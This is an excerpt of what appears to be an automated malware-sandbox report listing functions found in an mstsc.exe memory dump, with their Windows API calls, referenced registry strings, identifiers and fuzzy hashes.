                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Monitor$FromInfoWindow
                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                    • API String ID: 332468611-3887548279
                                                                                                                                                                                    • Opcode ID: 8d82dd2375cde6609ea15687e161f09084306394b136d3052acc75dbed4d2af4
                                                                                                                                                                                    • Instruction ID: 0adc1ccb142fa56dd09057a8fbae47a5d3dc89b8bd3eacbca424bd02b6687e39
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d82dd2375cde6609ea15687e161f09084306394b136d3052acc75dbed4d2af4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 19015E75A11208AFDB14CFA5EC89AEEBBF8EF49321F50416AE801A7240EB709804CB50
                                                                                                                                                                                    Function 00966BEE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation, xrefs: 00966BFA, 00966C07
                                                                                                                                                                                    • SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults, xrefs: 00966BF1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID: SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation$SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults
                                                                                                                                                                                    • API String ID: 71445658-4013566426
                                                                                                                                                                                    • Opcode ID: 127569ea576c0e5831e7409d01ee5ac242f0591f83be956c80cdc87501dd6c07
                                                                                                                                                                                    • Instruction ID: adbe9f4c7a32ba4011e29dd1d4433eaf1255b0528c6c105180511d70752a3165
                                                                                                                                                                                    • Opcode Fuzzy Hash: 127569ea576c0e5831e7409d01ee5ac242f0591f83be956c80cdc87501dd6c07
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BE05EB0751225DFEB2C1A28CCABB36A29DDB5071AF21416CBA43DD1E1E6695800A360
                                                                                                                                                                                    Function 009673D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,00967412,00000000,00000000,0096766F,00000000,?,00000000,00000000,?), ref: 009673E4
                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 009673F2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoad
                                                                                                                                                                                    • String ID: MUI
                                                                                                                                                                                    • API String ID: 2619053042-1339004836
                                                                                                                                                                                    • Opcode ID: f56fa65762ce12c398ad60486a50b8c0988728e1af240ebf8cdcb358446d9437
                                                                                                                                                                                    • Instruction ID: f3a9e6acb226446d4a2eb4aadf682e9e47742a52aae4621ab5d50ee2a71c1830
                                                                                                                                                                                    • Opcode Fuzzy Hash: f56fa65762ce12c398ad60486a50b8c0988728e1af240ebf8cdcb358446d9437
                                                                                                                                                                                    • Instruction Fuzzy Hash: 84D012B22991207BE66027597C0DFEB1A0CDB81B65F154145FC2095191DBD49C4251D5
                                                                                                                                                                                    Function 00953097 Relevance: 5.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32 ref: 00953C10
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?), ref: 00953C25
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocLocalmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 310742750-0
                                                                                                                                                                                    • Opcode ID: 0d83f6231b7b6c273c238f7dce09cb96073afb66963e2858c358f0bc8d056c10
                                                                                                                                                                                    • Instruction ID: a0d632220c4c181c304dd41d48dc2040316bd23eabcc9a912e877dea47fdbb31
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d83f6231b7b6c273c238f7dce09cb96073afb66963e2858c358f0bc8d056c10
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F21F531500706ABDB20DE778C05B7B77ACABC1796F04C52DFD59D6280DA74DA09D7A0